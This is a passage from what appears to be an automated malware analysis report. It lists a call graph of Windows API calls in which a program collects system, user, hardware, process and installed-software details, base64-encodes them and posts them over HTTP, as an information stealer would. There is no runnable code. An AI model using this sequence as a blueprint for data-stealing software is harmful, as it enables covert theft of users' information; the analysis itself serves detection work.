calls 73942->73943 73945 8e5f5b 73943->73945 73946 8e6671 73944->73946 73947 8f21e9 lstrcpy 73945->73947 73948 8f2265 3 API calls 73946->73948 73951 8e5f66 73947->73951 73949 8e6684 73948->73949 73950 8f21e9 lstrcpy 73949->73950 73950->73956 73952 8f2265 3 API calls 73951->73952 73953 8e5f92 73952->73953 73954 8f21e9 lstrcpy 73953->73954 73955 8e5f9d 73954->73955 73958 8f2265 3 API calls 73955->73958 73957 8fe88c ___crtMessageBoxW 5 API calls 73956->73957 73959 8e6717 73957->73959 73960 8e5fbe 73958->73960 74090 8f514a strtok_s 73959->74090 73961 8f21e9 lstrcpy 73960->73961 73962 8e5fc9 73961->73962 73963 8f2223 2 API calls 73962->73963 73964 8e5feb 73963->73964 73965 8f21e9 lstrcpy 73964->73965 73966 8e5ff6 73965->73966 73967 8f2265 3 API calls 73966->73967 73968 8e6017 73967->73968 73969 8f21e9 lstrcpy 73968->73969 73970 8e6022 73969->73970 73971 8f2265 3 API calls 73970->73971 73972 8e6043 73971->73972 73973 8f21e9 lstrcpy 73972->73973 73974 8e604e 73973->73974 73975 8f2265 3 API calls 73974->73975 73976 8e6070 73975->73976 73977 8f2223 2 API calls 73976->73977 73978 8e607b 73977->73978 73979 8f21e9 lstrcpy 73978->73979 73980 8e6086 73979->73980 73981 8e609c InternetConnectA 73980->73981 73982 8e60ca HttpOpenRequestA 73981->73982 73983 8e6638 73981->73983 73984 8e610e 73982->73984 73985 8e662c InternetCloseHandle 73982->73985 73983->73938 73986 8e6116 InternetSetOptionA 73984->73986 73987 8e6132 73984->73987 73985->73983 73986->73987 73988 8f2265 3 API calls 73987->73988 73989 8e6148 73988->73989 73990 8f21e9 lstrcpy 73989->73990 73991 8e6153 73990->73991 73992 8f2223 2 API calls 73991->73992 73993 8e6175 73992->73993 73994 8f21e9 lstrcpy 73993->73994 73995 8e6180 73994->73995 73996 8f2265 3 API calls 73995->73996 73997 8e61a1 73996->73997 73998 8f21e9 lstrcpy 73997->73998 73999 8e61ac 73998->73999 74000 8f2265 3 API calls 73999->74000 74001 8e61ce 74000->74001 74002 8f21e9 lstrcpy 74001->74002 74003 8e61d9 74002->74003 74004 8f2265 3 API calls 74003->74004 74005 8e61fb 74004->74005 74006 8f21e9 lstrcpy 74005->74006 74007 8e6206 74006->74007 74008 8f2265 3 API calls 74007->74008 74009 8e6227 74008->74009 74010 8f21e9 lstrcpy 74009->74010 74011 8e6232 74010->74011 74012 8f2223 2 API calls 74011->74012 74013 8e6251 74012->74013 74014 8f21e9 lstrcpy 74013->74014 74015 8e625c 74014->74015 74016 8f2265 3 API calls 74015->74016 74017 8e627d 74016->74017 74018 8f21e9 lstrcpy 74017->74018 74019 8e6288 74018->74019 74020 8f2265 3 API calls 74019->74020 74021 8e62a9 74020->74021 74022 8f21e9 lstrcpy 74021->74022 74023 8e62b4 74022->74023 74024 8f2223 2 API calls 74023->74024 74025 8e62d6 74024->74025 74026 8f21e9 lstrcpy 74025->74026 74027 8e62e1 74026->74027 74028 8f2265 3 API calls 74027->74028 74029 8e6302 74028->74029 74030 8f21e9 lstrcpy 74029->74030 74031 8e630d 74030->74031 74032 8f2265 3 API calls 74031->74032 74033 8e632f 74032->74033 74034 8f21e9 lstrcpy 74033->74034 74035 8e633a 74034->74035 74036 8f2265 3 API calls 74035->74036 74037 8e635b 74036->74037 74038 8f21e9 lstrcpy 74037->74038 74039 8e6366 74038->74039 74040 8f2265 3 API calls 74039->74040 74041 8e6387 74040->74041 74042 8f21e9 lstrcpy 74041->74042 74043 8e6392 74042->74043 74044 8f2265 3 API calls 74043->74044 74045 8e63b3 74044->74045 74046 8f21e9 lstrcpy 74045->74046 74047 8e63be 74046->74047 74048 8f2265 3 API calls 74047->74048 74049 8e63df 74048->74049 74050 8f21e9 lstrcpy 74049->74050 74051 8e63ea 74050->74051 74052 8f2265 3 API calls 74051->74052 74053 8e640b 74052->74053 74054 8f21e9 lstrcpy 74053->74054 74055 8e6416 74054->74055 74056 8f2223 2 API calls 74055->74056 74057 8e6432 74056->74057 74058 8f21e9 lstrcpy 74057->74058 74059 8e643d 74058->74059 74060 8f2265 3 API calls 74059->74060 74061 8e645e 74060->74061 74062 8f21e9 lstrcpy 74061->74062 74063 8e6469 74062->74063 74064 8f2265 3 API calls 74063->74064 74065 8e648b 74064->74065 74066 8f21e9 lstrcpy 74065->74066 74067 8e6496 74066->74067 74068 8f2265 3 API calls 74067->74068 74069 8e64b7 74068->74069 74070 8f21e9 lstrcpy 74069->74070 74071 8e64c2 74070->74071 74072 8f2265 3 API calls 74071->74072 74073 8e64e3 74072->74073 74074 8f21e9 lstrcpy 74073->74074 74075 8e64ee 74074->74075 74076 8f2223 2 API calls 74075->74076 74077 8e650d 74076->74077 74078 8f21e9 lstrcpy 74077->74078 74079 8e6518 74078->74079 74080 8e6523 lstrlen lstrlen GetProcessHeap RtlAllocateHeap lstrlen 74079->74080 74770 9088d0 74080->74770 74082 8e6569 lstrlen lstrlen 74083 9088d0 _memmove 74082->74083 74084 8e6592 lstrlen HttpSendRequestA 74083->74084 74085 8e6601 InternetReadFile 74084->74085 74086 8e6620 InternetCloseHandle 74085->74086 74088 8e65c2 74085->74088 74086->73985 74087 8f2265 3 API calls 74087->74088 74088->74085 74088->74086 74088->74087 74089 8f21e9 lstrcpy 74088->74089 74089->74088 74091 8f51f1 74090->74091 74092 8f5176 74090->74092 74091->72904 74093 8f21a5 2 API calls 74092->74093 74094 8f51d7 strtok_s 74092->74094 74095 8f21a5 2 API calls 74092->74095 74093->74094 74094->74091 74094->74092 74095->74092 74099 8f4ed4 74096->74099 74097 8f4f80 StrCmpCA 74097->74099 74098 8f4fd3 74098->72912 74099->74097 74099->74098 74100 8f21a5 2 API calls 74099->74100 74101 8f4fb5 strtok_s 74099->74101 74102 8f4f4f StrCmpCA 74099->74102 74103 8f4f2a StrCmpCA 74099->74103 74104 8f4ef9 StrCmpCA 74099->74104 74100->74099 74101->74099 74102->74099 74103->74099 74104->74099 74106 8f5083 74105->74106 74107 8f500b 74105->74107 74106->72920 74108 8f5031 StrCmpCA 74107->74108 74109 8f21a5 2 API calls 74107->74109 74110 8f5069 strtok_s 74107->74110 74111 8f21a5 2 API calls 74107->74111 74108->74107 74109->74110 74110->74106 74110->74107 74111->74107 74113 8f2143 lstrcpy 74112->74113 74114 8f58dc 74113->74114 74115 8f2265 3 API calls 74114->74115 74116 8f58ec 74115->74116 74117 8f21e9 lstrcpy 74116->74117 74118 8f58f4 74117->74118 74119 8f2265 3 API calls 74118->74119 74120 8f590c 74119->74120 74121 8f21e9 lstrcpy 74120->74121 74122 8f5914 74121->74122 74123 8f2265 3 API calls 74122->74123 74124 8f592c 74123->74124 74125 8f21e9 lstrcpy 74124->74125 74126 8f5934 74125->74126 74127 8f2265 3 API calls 74126->74127 74128 8f594c 74127->74128 74129 8f21e9 lstrcpy 74128->74129 74130 8f5954 74129->74130 74131 8f2265 3 API calls 74130->74131 74132 8f596c 74131->74132 74133 8f21e9 lstrcpy 74132->74133 74134 8f5974 74133->74134 74776 8f291c GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 74134->74776 74137 8f2265 3 API calls 74138 8f598d 74137->74138 74139 8f21e9 lstrcpy 74138->74139 74140 8f5995 74139->74140 74141 8f2265 3 API calls 74140->74141 74142 8f59ad 74141->74142 74143 8f21e9 lstrcpy 74142->74143 74144 8f59b5 74143->74144 74145 8f2265 3 API calls 74144->74145 74146 8f59cd 74145->74146 74147 8f21e9 lstrcpy 74146->74147 74148 8f59d5 74147->74148 74779 8f3230 74148->74779 74151 8f2265 3 API calls 74152 8f59ee 74151->74152 74153 8f21e9 lstrcpy 74152->74153 74154 8f59f6 74153->74154 74155 8f2265 3 API calls 74154->74155 74156 8f5a0e 74155->74156 74157 8f21e9 lstrcpy 74156->74157 74158 8f5a16 74157->74158 74159 8f2265 3 API calls 74158->74159 74160 8f5a2e 74159->74160 74161 8f21e9 lstrcpy 74160->74161 74162 8f5a36 74161->74162 74163 8f32e0 11 API calls 74162->74163 74164 8f5a46 74163->74164 74165 8f2223 2 API calls 74164->74165 74166 8f5a53 74165->74166 74167 8f21e9 lstrcpy 74166->74167 74168 8f5a5b 74167->74168 74169 8f2265 3 API calls 74168->74169 74170 8f5a7b 74169->74170 74171 8f21e9 lstrcpy 74170->74171 74172 8f5a83 74171->74172 74173 8f2265 3 API calls 74172->74173 74174 8f5a9b 74173->74174 74175 8f21e9 lstrcpy 74174->74175 74176 8f5aa3 74175->74176 74177 8f25fe 19 API calls 74176->74177 74178 8f5ab3 74177->74178 74179 8f2223 2 API calls 74178->74179 74180 8f5ac0 74179->74180 74181 8f21e9 lstrcpy 74180->74181 74182 8f5ac8 74181->74182 74183 8f2265 3 API calls 74182->74183 74184 8f5ae8 74183->74184 74185 8f21e9 lstrcpy 74184->74185 74186 8f5af0 74185->74186 74187 8f2265 3 API calls 74186->74187 74188 8f5b08 74187->74188 74189 8f21e9 lstrcpy 74188->74189 74190 8f5b10 74189->74190 74191 8f5b18 GetCurrentProcessId 74190->74191 74786 8f3ee1 OpenProcess 74191->74786 74194 8f2223 2 API calls 74195 8f5b35 74194->74195 74196 8f21e9 lstrcpy 74195->74196 74197 8f5b3d 74196->74197 74198 8f2265 3 API calls 74197->74198 74199 8f5b5d 74198->74199 74200 8f21e9 lstrcpy 74199->74200 74201 8f5b65 74200->74201 74202 8f2265 3 API calls 74201->74202 74203 8f5b7d 74202->74203 74204 8f21e9 lstrcpy 74203->74204 74205 8f5b85 74204->74205 74206 8f2265 3 API calls 74205->74206 74207 8f5b9d 74206->74207 74208 8f21e9 lstrcpy 74207->74208 74209 8f5ba5 74208->74209 74210 8f2265 3 API calls 74209->74210 74211 8f5bbd 74210->74211 74212 8f21e9 lstrcpy 74211->74212 74213 8f5bc5 74212->74213 74793 8f278c GetProcessHeap RtlAllocateHeap 74213->74793 74216 8f2265 3 API calls 74217 8f5bde 74216->74217 74218 8f21e9 lstrcpy 74217->74218 74219 8f5be6 74218->74219 74220 8f2265 3 API calls 74219->74220 74221 8f5bfe 74220->74221 74222 8f21e9 lstrcpy 74221->74222 74223 8f5c06 74222->74223 74224 8f2265 3 API calls 74223->74224 74225 8f5c1e 74224->74225 74226 8f21e9 lstrcpy 74225->74226 74227 8f5c26 74226->74227 74800 8f3463 74227->74800 74230 8f2223 2 API calls 74231 8f5c43 74230->74231 74232 8f21e9 lstrcpy 74231->74232 74233 8f5c4b 74232->74233 74234 8f2265 3 API calls 74233->74234 74235 8f5c6b 74234->74235 74236 8f21e9 lstrcpy 74235->74236 74237 8f5c73 74236->74237 74238 8f2265 3 API calls 74237->74238 74239 8f5c8b 74238->74239 74240 8f21e9 lstrcpy 74239->74240 74241 8f5c93 74240->74241 74817 8f35f3 74241->74817 74243 8f5ca4 74244 8f2223 2 API calls 74243->74244 74245 8f5cb2 74244->74245 74246 8f21e9 lstrcpy 74245->74246 74247 8f5cba 74246->74247 74248 8f2265 3 API calls 74247->74248 74249 8f5cda 74248->74249 74250 8f21e9 lstrcpy 74249->74250 74251 8f5ce2 74250->74251 74252 8f2265 3 API calls 74251->74252 74253 8f5cfa 74252->74253 74254 8f21e9 lstrcpy 74253->74254 74255 8f5d02 74254->74255 74256 8f28e1 3 API calls 74255->74256 74257 8f5d0f 74256->74257 74258 8f2265 3 API calls 74257->74258 74259 8f5d1b 74258->74259 74260 8f21e9 lstrcpy 74259->74260 74261 8f5d23 74260->74261 74262 8f2265 3 API calls 74261->74262 74263 8f5d3b 74262->74263 74264 8f21e9 lstrcpy 74263->74264 74265 8f5d43 74264->74265 74266 8f2265 3 API calls 74265->74266 74267 8f5d5b 74266->74267 74268 8f21e9 lstrcpy 74267->74268 74269 8f5d63 74268->74269 74832 8f28af GetProcessHeap RtlAllocateHeap GetUserNameA 74269->74832 74271 8f5d70 74272 8f2265 3 API calls 74271->74272 74273 8f5d7c 74272->74273 74274 8f21e9 lstrcpy 74273->74274 74275 8f5d84 74274->74275 74276 8f2265 3 API calls 74275->74276 74277 8f5d9c 74276->74277 74278 8f21e9 lstrcpy 74277->74278 74279 8f5da4 74278->74279 74280 8f2265 3 API calls 74279->74280 74281 8f5dbc 74280->74281 74282 8f21e9 lstrcpy 74281->74282 74283 8f5dc4 74282->74283 74833 8f31bf 7 API calls 74283->74833 74286 8f2223 2 API calls 74287 8f5de3 74286->74287 74288 8f21e9 lstrcpy 74287->74288 74289 8f5deb 74288->74289 74290 8f2265 3 API calls 74289->74290 74291 8f5e0b 74290->74291 74292 8f21e9 lstrcpy 74291->74292 74293 8f5e13 74292->74293 74294 8f2265 3 API calls 74293->74294 74295 8f5e2b 74294->74295 74296 8f21e9 lstrcpy 74295->74296 74297 8f5e33 74296->74297 74836 8f2a37 74297->74836 74300 8f2223 2 API calls 74301 8f5e50 74300->74301 74302 8f21e9 lstrcpy 74301->74302 74303 8f5e58 74302->74303 74304 8f2265 3 API calls 74303->74304 74305 8f5e78 74304->74305 74306 8f21e9 lstrcpy 74305->74306 74307 8f5e80 74306->74307 74308 8f2265 3 API calls 74307->74308 74309 8f5e98 74308->74309 74310 8f21e9 lstrcpy 74309->74310 74311 8f5ea0 74310->74311 74312 8f291c 9 API calls 74311->74312 74313 8f5ead 74312->74313 74314 8f2265 3 API calls 74313->74314 74315 8f5eb9 74314->74315 74316 8f21e9 lstrcpy 74315->74316 74317 8f5ec1 74316->74317 74318 8f2265 3 API calls 74317->74318 74319 8f5ed9 74318->74319 74320 8f21e9 lstrcpy 74319->74320 74321 8f5ee1 74320->74321 74322 8f2265 3 API calls 74321->74322 74323 8f5ef9 74322->74323 74324 8f21e9 lstrcpy 74323->74324 74325 8f5f01 74324->74325 74848 8f298a GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 74325->74848 74328 8f2265 3 API calls 74329 8f5f1a 74328->74329 74330 8f21e9 lstrcpy 74329->74330 74331 8f5f22 74330->74331 74332 8f2265 3 API calls 74331->74332 74333 8f5f3a 74332->74333 74334 8f21e9 lstrcpy 74333->74334 74335 8f5f42 74334->74335 74336 8f2265 3 API calls 74335->74336 74337 8f5f5a 74336->74337 74338 8f21e9 lstrcpy 74337->74338 74339 8f5f62 74338->74339 74340 8f2265 3 API calls 74339->74340 74341 8f5f7a 74340->74341 74342 8f21e9 lstrcpy 74341->74342 74343 8f5f82 74342->74343 74853 8f2bad GetProcessHeap RtlAllocateHeap RegOpenKeyExA 74343->74853 74345 8f5f8f 74346 8f2265 3 API calls 74345->74346 74347 8f5f9b 74346->74347 74348 8f21e9 lstrcpy 74347->74348 74349 8f5fa3 74348->74349 74350 8f2265 3 API calls 74349->74350 74351 8f5fbb 74350->74351 74352 8f21e9 lstrcpy 74351->74352 74353 8f5fc3 74352->74353 74354 8f2265 3 API calls 74353->74354 74355 8f5fdb 74354->74355 74356 8f21e9 lstrcpy 74355->74356 74357 8f5fe3 74356->74357 74856 8f2c63 74357->74856 74360 8f2265 3 API calls 74361 8f5ffc 74360->74361 74362 8f21e9 lstrcpy 74361->74362 74363 8f6004 74362->74363 74364 8f2265 3 API calls 74363->74364 74365 8f601c 74364->74365 74366 8f21e9 lstrcpy 74365->74366 74367 8f6024 74366->74367 74368 8f2265 3 API calls 74367->74368 74369 8f603c 74368->74369 74370 8f21e9 lstrcpy 74369->74370 74371 8f6044 74370->74371 74871 8f2c16 GetSystemInfo wsprintfA 74371->74871 74374 8f2265 3 API calls 74375 8f605d 74374->74375 74376 8f21e9 lstrcpy 74375->74376 74377 8f6065 74376->74377 74378 8f2265 3 API calls 74377->74378 74379 8f607d 74378->74379 74380 8f21e9 lstrcpy 74379->74380 74381 8f6085 74380->74381 74382 8f2265 3 API calls 74381->74382 74383 8f609d 74382->74383 74384 8f21e9 lstrcpy 74383->74384 74385 8f60a5 74384->74385 74874 8f2d75 GetProcessHeap RtlAllocateHeap 74385->74874 74388 8f2265 3 API calls 74389 8f60be 74388->74389 74390 8f21e9 lstrcpy 74389->74390 74391 8f60c6 74390->74391 74392 8f2265 3 API calls 74391->74392 74393 8f60e1 74392->74393 74394 8f21e9 lstrcpy 74393->74394 74395 8f60e9 74394->74395 74396 8f2265 3 API calls 74395->74396 74397 8f6104 74396->74397 74398 8f21e9 lstrcpy 74397->74398 74399 8f610c 74398->74399 74881 8f2dee 74399->74881 74402 8f2223 2 API calls 74403 8f612c 74402->74403 74404 8f21e9 lstrcpy 74403->74404 74405 8f6134 74404->74405 74406 8f2265 3 API calls 74405->74406 74407 8f6157 74406->74407 74408 8f21e9 lstrcpy 74407->74408 74409 8f615f 74408->74409 74410 8f2265 3 API calls 74409->74410 74411 8f6177 74410->74411 74412 8f21e9 lstrcpy 74411->74412 74413 8f617f 74412->74413 74889 8f3101 74413->74889 74416 8f2223 2 API calls 74417 8f619f 74416->74417 74418 8f21e9 lstrcpy 74417->74418 74419 8f61a7 74418->74419 74420 8f2265 3 API calls 74419->74420 74421 8f61cd 74420->74421 74422 8f21e9 lstrcpy 74421->74422 74423 8f61d5 74422->74423 74424 8f2265 3 API calls 74423->74424 74425 8f61f0 74424->74425 74426 8f21e9 lstrcpy 74425->74426 74427 8f61f8 74426->74427 74899 8f2e5f 74427->74899 74430 8f2223 2 API calls 74431 8f621d 74430->74431 74432 8f21e9 lstrcpy 74431->74432 74433 8f6225 74432->74433 74434 8f2e5f 21 API calls 74433->74434 74435 8f6246 74434->74435 74436 8f2223 2 API calls 74435->74436 74437 8f6255 74436->74437 74438 8f21e9 lstrcpy 74437->74438 74439 8f625d 74438->74439 74440 8f2265 3 API calls 74439->74440 74441 8f6280 74440->74441 74442 8f21e9 lstrcpy 74441->74442 74443 8f6288 74442->74443 74444 8e1ced lstrcpy 74443->74444 74445 8f629d lstrlen 74444->74445 74446 8f2143 lstrcpy 74445->74446 74447 8f62ba 74446->74447 74919 8f8be6 74447->74919 74449 8f62c3 74449->72924 74451 8f2175 lstrcpy 74450->74451 74452 8e5182 74451->74452 74453 8e49de 5 API calls 74452->74453 74454 8e518e GetProcessHeap RtlAllocateHeap InternetOpenA StrCmpCA 74453->74454 74455 8e51f3 74454->74455 74456 8e5373 InternetCloseHandle 74455->74456 74457 8e5201 InternetConnectA 74455->74457 74460 8e52c6 74456->74460 74458 8e522d HttpOpenRequestA 74457->74458 74459 8e5367 InternetCloseHandle 74457->74459 74461 8e526e 74458->74461 74462 8e535b InternetCloseHandle 74458->74462 74459->74456 74465 8fe88c ___crtMessageBoxW 5 API calls 74460->74465 74463 8e528e HttpSendRequestA HttpQueryInfoA 74461->74463 74464 8e5272 InternetSetOptionA 74461->74464 74462->74459 74463->74460 74466 8e52e3 74463->74466 74464->74463 74467 8e53a8 74465->74467 74466->74462 74468 8e52e9 InternetReadFile 74466->74468 74467->72931 74468->74462 74468->74466 75172 8e902f 74469->75172 74488 8efad4 74728 8f2143 lstrcpy 74727->74728 74729 8e29f5 74728->74729 74729->73686 74731 8f2143 lstrcpy 74730->74731 74732 8e2a06 74731->74732 74732->73686 74734 8f2143 lstrcpy 74733->74734 74735 8e2a17 74734->74735 74735->73686 74737 8f2175 lstrcpy 74736->74737 74738 8f8afb 74737->74738 74739 8f2175 lstrcpy 74738->74739 74740 8f8b06 74739->74740 74741 8f2175 lstrcpy 74740->74741 74742 8f8b11 74741->74742 74742->73742 74743->73686 74744->73686 74745->73686 74747 8f3309 74746->74747 74748 8f3398 74746->74748 74750 8f2143 lstrcpy 74747->74750 74749 8f2143 lstrcpy 74748->74749 74751 8f33a4 74749->74751 74752 8f331c _memset 74750->74752 74753 8fe88c ___crtMessageBoxW 5 API calls 74751->74753 74763 8f421b lstrcpy malloc strncpy 74752->74763 74754 8f33b1 74753->74754 74754->73763 74756 8f3346 lstrcat 74764 8e2910 74756->74764 74758 8f3363 lstrcat 74759 8f3380 74758->74759 74760 8f2143 lstrcpy 74759->74760 74761 8f338e 74760->74761 74761->74751 74762->73766 74763->74756 74765 8e2914 74764->74765 74765->74758 74767 8e49ec 74766->74767 74767->74767 74768 8e49f3 ??_U@YAPAXI ??_U@YAPAXI ??_U@YAPAXI lstrlen InternetCrackUrlA 74767->74768 74769 8e4a4f 74768->74769 74769->73776 74771 9088e8 74770->74771 74771->74082 74771->74771 74774 8e920e LocalAlloc 74772->74774 74775 8e924a 74774->74775 74775->73941 74777 8fe88c ___crtMessageBoxW 5 API calls 74776->74777 74778 8f2988 74777->74778 74778->74137 74936 905490 74779->74936 74781 8f3268 RegOpenKeyExA 74782 8f32ad RegCloseKey CharToOemA 74781->74782 74783 8f328c RegQueryValueExA 74781->74783 74784 8fe88c ___crtMessageBoxW 5 API calls 74782->74784 74783->74782 74785 8f32de 74784->74785 74785->74151 74787 8f3f0f K32GetModuleFileNameExA CloseHandle 74786->74787 74788 8f3f2b 74786->74788 74787->74788 74789 8f2143 lstrcpy 74788->74789 74790 8f3f37 74789->74790 74791 8fe88c ___crtMessageBoxW 5 API calls 74790->74791 74792 8f3f45 74791->74792 74792->74194 74938 8f2872 74793->74938 74796 8f27bf RegOpenKeyExA 74798 8f27df RegQueryValueExA 74796->74798 74799 8f27f7 RegCloseKey 74796->74799 74797 8f27b8 74797->74216 74798->74799 74799->74797 74945 910989 74800->74945 74802 8f346f CoInitializeEx CoInitializeSecurity CoCreateInstance 74803 8f34c7 74802->74803 74804 8f34cf CoSetProxyBlanket 74803->74804 74807 8f35c0 74803->74807 74810 8f34ff 74804->74810 74805 8f2143 lstrcpy 74806 8f35eb 74805->74806 74954 9109e5 74806->74954 74807->74805 74810->74807 74811 8f3533 VariantInit 74810->74811 74812 8f3552 74811->74812 74946 8f33b3 74812->74946 74814 8f355d FileTimeToSystemTime GetProcessHeap RtlAllocateHeap wsprintfA 74815 8f2143 lstrcpy 74814->74815 74816 8f35b4 VariantClear 74815->74816 74816->74806 74958 91091d 74817->74958 74819 8f35ff CoInitializeEx CoInitializeSecurity CoCreateInstance 74820 8f3655 74819->74820 74821 8f365d CoSetProxyBlanket 74820->74821 74824 8f36ef 74820->74824 74825 8f368d 74821->74825 74822 8f2143 lstrcpy 74823 8f371a 74822->74823 74823->74243 74824->74822 74825->74824 74826 8f36b5 VariantInit 74825->74826 74827 8f36d4 74826->74827 74959 8f399e LocalAlloc CharToOemW 74827->74959 74829 8f36dc 74830 8f2143 lstrcpy 74829->74830 74831 8f36e3 VariantClear 74830->74831 74831->74823 74832->74271 74834 8f2143 lstrcpy 74833->74834 74835 8f3229 74834->74835 74835->74286 74837 8f2143 lstrcpy 74836->74837 74838 8f2a5e GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 74837->74838 74839 8f2b49 74838->74839 74847 8f2a98 74838->74847 74841 8f2b55 LocalFree 74839->74841 74842 8f2b61 74839->74842 74840 8f2a9e GetLocaleInfoA 74840->74847 74841->74842 74843 8fe88c ___crtMessageBoxW 5 API calls 74842->74843 74844 8f2b71 74843->74844 74844->74300 74845 8f2265 lstrlen lstrcpy lstrcat 74845->74847 74846 8f21e9 lstrcpy 74846->74847 74847->74839 74847->74840 74847->74845 74847->74846 74849 8f29c6 wsprintfA 74848->74849 74850 8f29e2 74848->74850 74849->74850 74851 8fe88c ___crtMessageBoxW 5 API calls 74850->74851 74852 8f29ef 74851->74852 74852->74328 74854 8f2c08 RegCloseKey 74853->74854 74855 8f2bf0 RegQueryValueExA 74853->74855 74854->74345 74855->74854 74857 8f2cd8 GetLogicalProcessorInformationEx 74856->74857 74858 8f2ca4 GetLastError 74857->74858 74860 8f2ce3 74857->74860 74859 8f2d4f 74858->74859 74869 8f2cb3 74858->74869 74862 8f2d48 74859->74862 74963 8f37b7 GetProcessHeap HeapFree 74859->74963 74962 8f37b7 GetProcessHeap HeapFree 74860->74962 74867 8fe88c ___crtMessageBoxW 5 API calls 74862->74867 74863 8f2d1c 74863->74862 74868 8f2d25 wsprintfA 74863->74868 74870 8f2d73 74867->74870 74868->74862 74869->74857 74869->74862 74960 8f37b7 GetProcessHeap HeapFree 74869->74960 74961 8f37d4 GetProcessHeap RtlAllocateHeap 74869->74961 74870->74360 74872 8fe88c ___crtMessageBoxW 5 API calls 74871->74872 74873 8f2c61 74872->74873 74873->74374 74964 8f3782 74874->74964 74877 8f2dbb wsprintfA 74879 8fe88c ___crtMessageBoxW 5 API calls 74877->74879 74880 8f2dec 74879->74880 74880->74388 74882 8f2143 lstrcpy 74881->74882 74883 8f2e0f 74882->74883 74884 8f2e3b EnumDisplayDevicesA 74883->74884 74885 8f2e4f 74883->74885 74886 8f21a5 2 API calls 74883->74886 74884->74883 74884->74885 74887 8fe88c ___crtMessageBoxW 5 API calls 74885->74887 74886->74883 74888 8f2e5d 74887->74888 74888->74402 74890 8f2143 lstrcpy 74889->74890 74891 8f3122 CreateToolhelp32Snapshot Process32First 74890->74891 74892 8f314a 74891->74892 74893 8f31a8 CloseHandle 74891->74893 74895 8f3196 Process32Next 74892->74895 74897 8f2265 lstrlen lstrcpy lstrcat 74892->74897 74898 8f21e9 lstrcpy 74892->74898 74894 8fe88c ___crtMessageBoxW 5 API calls 74893->74894 74896 8f31bd 74894->74896 74895->74892 74895->74893 74896->74416 74897->74892 74898->74892 74900 8f2143 lstrcpy 74899->74900 74901 8f2e97 RegOpenKeyExA 74900->74901 74902 8f30d4 74901->74902 74905 8f2edd 74901->74905 74904 8f2175 lstrcpy 74902->74904 74903 8f2ee3 RegEnumKeyExA 74903->74905 74906 8f2f20 wsprintfA RegOpenKeyExA 74903->74906 74907 8f30e5 74904->74907 74905->74903 74908 8f30ba 74905->74908 74912 8f309c RegCloseKey 74905->74912 74916 8f21e9 lstrcpy 74905->74916 74917 8f300c RegQueryValueExA 74905->74917 74918 8f2265 lstrlen lstrcpy lstrcat 74905->74918 74909 8f30bc RegCloseKey 74906->74909 74910 8f2f66 RegQueryValueExA 74906->74910 74914 8fe88c ___crtMessageBoxW 5 API calls 74907->74914 74911 8f30c8 RegCloseKey 74908->74911 74909->74911 74910->74912 74913 8f2f9c lstrlen 74910->74913 74911->74902 74912->74905 74913->74905 74913->74912 74915 8f30ff 74914->74915 74915->74430 74916->74905 74917->74905 74917->74912 74918->74905 74920 8f8bf6 74919->74920 74921 8f21e9 lstrcpy 74920->74921 74922 8f8c13 74921->74922 74923 8f21e9 lstrcpy 74922->74923 74924 8f8c2f 74923->74924 74925 8f21e9 lstrcpy 74924->74925 74926 8f8c3a 74925->74926 74927 8f21e9 lstrcpy 74926->74927 74928 8f8c45 74927->74928 74929 8f8c4c Sleep 74928->74929 74930 8f8c5c 74928->74930 74929->74928 74931 8f8c78 CreateThread WaitForSingleObject 74930->74931 74966 8fe4ae 51 API calls 74930->74966 74932 8f2143 lstrcpy 74931->74932 74967 8f8b15 74931->74967 74935 8f8ca0 74932->74935 74934 8f8c76 74934->74931 74935->74449 74937 90549c 74936->74937 74937->74781 74937->74937 74941 8f2805 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 74938->74941 74940 8f27b4 74940->74796 74940->74797 74942 8f285f RegCloseKey 74941->74942 74943 8f2848 RegQueryValueExA 74941->74943 74944 8f286f 74942->74944 74943->74942 74944->74940 74945->74802 74957 91091d 74946->74957 74948 8f33bf CoCreateInstance 74949 8f33e7 SysAllocString 74948->74949 74950 8f3443 74948->74950 74949->74950 74951 8f33f6 74949->74951 74950->74814 74952 8f343c SysFreeString 74951->74952 74953 8f341a _wtoi64 SysFreeString 74951->74953 74952->74950 74953->74952 74955 8fe88c ___crtMessageBoxW 5 API calls 74954->74955 74956 8f35f2 74955->74956 74956->74230 74957->74948 74958->74819 74959->74829 74960->74869 74961->74869 74962->74863 74963->74862 74965 8f2da9 GlobalMemoryStatusEx 74964->74965 74965->74877 74966->74934 74976 91091d 74967->74976 74969 8f8b21 lstrlen 74973 8f8b3d 74969->74973 74975 8f8b32 74969->74975 74970 8f2175 lstrcpy 74970->74973 74972 8f21e9 lstrcpy 74972->74973 74973->74970 74973->74972 74974 8f8ba3 StrCmpCA 74973->74974 74977 8e53aa 74973->74977 74974->74973 74974->74975 74976->74969 74978 8f2143 lstrcpy 74977->74978 74979 8e53e4 74978->74979 74980 8f2175 lstrcpy 74979->74980 74981 8e53f1 74980->74981 74982 8e49de 5 API calls 74981->74982 74983 8e53fd 74982->74983 75167 8f3ab9 74983->75167 74986 8f3ab9 4 API calls 74987 8e545b 74986->74987 74988 8f2143 lstrcpy 74987->74988 74989 8e546e 74988->74989 74990 8f2143 lstrcpy 74989->74990 74991 8e547e 74990->74991 74992 8f2143 lstrcpy 74991->74992 74993 8e548e 74992->74993 74994 8f2143 lstrcpy 74993->74994 74995 8e549e StrCmpCA 74994->74995 74996 8e54bd 74995->74996 74997 8e54cb InternetOpenA 74996->74997 74998 8e54e6 74996->74998 74997->74998 75004 8e5d8c 74997->75004 74999 8f38a6 7 API calls 74998->74999 75000 8e54f4 74999->75000 75001 8f2223 2 API calls 75000->75001 75002 8e5507 75001->75002 75006 8f2175 lstrcpy 75004->75006 75020 8e5cb1 75006->75020 75168 8f3aca CryptBinaryToStringA 75167->75168 75169 8e543a lstrlen 75167->75169 75168->75169 75170 8f3ae3 GetProcessHeap RtlAllocateHeap 75168->75170 75169->74986 75170->75169 75171 8f3b00 CryptBinaryToStringA 75170->75171 75171->75169 75523 8e8fef malloc 75172->75523 75174 8e903d 75174->74488 75526 8e7c43 75523->75526 75529 8e7b02 75526->75529 75528 8e7c5d 75528->75174 75530 8e7b19 75529->75530 75531 8e7b14 75529->75531 75546 8e766f 75530->75546 75531->75528 75547 8e7680 75546->75547 75549 8e7687 75547->75549 76896 6c9ab8ae 76898 6c9ab8ba ___scrt_is_nonwritable_in_current_image 76896->76898 76897 6c9ab8c9 76898->76897 76899 6c9ab8e3 dllmain_raw 